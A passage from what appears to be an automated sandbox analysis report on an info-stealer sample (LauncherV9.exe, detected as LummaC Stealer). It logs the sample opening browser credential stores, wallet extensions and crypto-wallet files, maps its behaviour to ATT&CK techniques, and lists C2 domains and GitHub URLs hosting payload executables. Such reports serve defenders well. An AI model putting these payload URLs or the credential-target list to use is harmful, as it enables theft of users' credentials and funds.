            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: Yara matchFile source: 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1472449424.000000000124F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dll.exe PID: 8252, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: dll.exe PID: 8252, type: MEMORYSTR
            Source: Yara matchFile source: 13.2.jaclo.exe.ba0000.0.unpack, type: UNPACKEDPE
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            PowerShell
            1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory1
            System Network Connections Discovery
            Remote Desktop Protocol41
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            4
            Obfuscated Files or Information
            Security Account Manager12
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder
            12
            Software Packing
            NTDS42
            System Information Discovery
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets551
            Security Software Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials1
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items421
            Virtualization/Sandbox Evasion
            DCSync421
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Network Configuration Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639444 Sample: LauncherV9.exe Startdate: 15/03/2025 Architecture: WINDOWS Score: 100 55 weaponrywo.digital 2->55 57 steamcommunity.com 2->57 59 14 other IPs or domains 2->59 81 Antivirus detection for URL or domain 2->81 83 Multi AV Scanner detection for submitted file 2->83 85 Yara detected LummaC Stealer 2->85 87 6 other signatures 2->87 9 LauncherV9.exe 1 4 2->9         started        12 Service.exe 2->12         started        14 Service.exe 2->14         started        signatures3 process4 signatures5 89 Found API chain indicative of debugger detection 9->89 91 Adds a directory exclusion to Windows Defender 9->91 16 dll.exe 9->16         started        20 cmd.exe 1 9->20         started        22 jaclo.exe 9->22         started        24 5 other processes 9->24 process6 dnsIp7 45 pupmeholk.bet 104.21.96.1, 443, 57842, 57849 CLOUDFLARENETUS United States 16->45 47 104.73.234.102, 443, 57862, 57863 AKAMAI-ASUS United States 16->47 65 Antivirus detection for dropped file 16->65 67 Multi AV Scanner detection for dropped file 16->67 69 Detected unpacking (changes PE section rights) 16->69 79 6 other signatures 16->79 71 Suspicious powershell command line found 20->71 73 Adds a directory exclusion to Windows Defender 20->73 26 powershell.exe 23 20->26         started        49 steamcommunity.com 23.197.127.21, 443, 57833, 57835 AKAMAI-ASN1EU United States 22->49 75 Hides threads from debuggers 22->75 51 89.208.104.175, 5000, 57846, 57859 PSKSET-ASRU Russian Federation 24->51 53 api.ipify.org 104.26.12.205, 57847, 57860, 57866 CLOUDFLARENETUS United States 24->53 77 Contains functionality to determine the online IP of the system 24->77 29 powershell.exe 14 16 24->29         started        33 powershell.exe 16 24->33         started        35 powershell.exe 24->35         started        signatures8 process9 dnsIp10 93 Loading BitLocker PowerShell Module 26->93 95 Powershell drops PE file 26->95 37 WmiPrvSE.exe 26->37         started        61 github.com 140.82.121.4, 443, 57831, 57834 GITHUBUS United States 29->61 63 raw.githubusercontent.com 185.199.110.133, 443, 57832, 57836 FASTLYUS Netherlands 29->63 39 C:\zjxbeopkqt\jaclo.exe, PE32 29->39 dropped 41 C:\Users\user\AppData\Local\dll.exe, PE32 33->41 dropped 43 C:\Users\user\AppData\Local\Service.exe, PE32+ 35->43 dropped file11 signatures12 process13

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            LauncherV9.exe49%VirustotalBrowse
            LauncherV9.exe39%ReversingLabsWin64.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\dll.exe100%AviraHEUR/AGEN.1314134
            C:\zjxbeopkqt\jaclo.exe100%AviraHEUR/AGEN.1314134
            C:\Users\user\AppData\Local\Service.exe69%ReversingLabsWin32.Ransomware.Generic
            C:\Users\user\AppData\Local\dll.exe83%ReversingLabsWin32.Trojan.LummaStealer
            C:\zjxbeopkqt\jaclo.exe88%ReversingLabsWin32.Trojan.LummaStealer
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://api.ipify.org60%Avira URL Cloudsafe
            http://store.steampowered0%Avira URL Cloudsafe
            http://api.ipify.orgc0%Avira URL Cloudsafe
            https://pupmeholk.bet/pLoskaDGcj9wXRZ10%Avira URL Cloudsafe
            http://api.ipify.orgInternetOpenUrl0%Avira URL Cloudsafe
            https://pupmeholk.bet/#kK0%Avira URL Cloudsafe
            https://bugildbett.top/100%Avira URL Cloudmalware
            https://latchclan.sh0%Avira URL Cloudsafe
            https://community.clo0%Avira URL Cloudsafe
            http://api.pifk0%Avira URL Cloudsafe
            https://pupmeholk.bet/0%Avira URL Cloudsafe
            https://pupmeholk.bet/pLoska0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            steamcommunity.com
            23.197.127.21
            truefalse
              high
              github.com
              140.82.121.4
              truefalse
                high
                pupmeholk.bet
                104.21.96.1
                truefalse
                  unknown
                  raw.githubusercontent.com
                  185.199.110.133
                  truefalse
                    high
                    api.ipify.org
                    104.26.12.205
                    truefalse
                      high
                      weaponrywo.digital
                      unknown
                      unknownfalse
                        high
                        latchclan.shop
                        unknown
                        unknownfalse
                          high
                          featureccus.shop
                          unknown
                          unknownfalse
                            high
                            bugildbett.top
                            unknown
                            unknownfalse
                              high
                              mrodularmall.top
                              unknown
                              unknownfalse
                                high
                                crosshairc.life
                                unknown
                                unknownfalse
                                  high
                                  cjlaspcorne.icu
                                  unknown
                                  unknownfalse
                                    high
                                    jowinjoinery.icu
                                    unknown
                                    unknownfalse
                                      high
                                      legenassedk.top
                                      unknown
                                      unknownfalse
                                        high
                                        htardwarehu.icu
                                        unknown
                                        unknownfalse
                                          high
                                          kbracketba.shop
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            http://api.ipify.org/false
                                              high
                                              https://steamcommunity.com/profiles/76561199822375128false
                                                high
                                                https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exefalse
                                                  high
                                                  https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exefalse
                                                    high
                                                    https://pupmeholk.bet/pLoskafalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exefalse
                                                      high
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://player.vimeo.comdll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/ac/?q=dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://api.ipify.orgcService.exe, 00000017.00000002.2513144408.00000270A9E9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=englidll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://steamcommunity.com/?subsection=broadcastsjaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_ojaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.microsoft.codll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://api.ipify.org/fonsService.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&amjaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 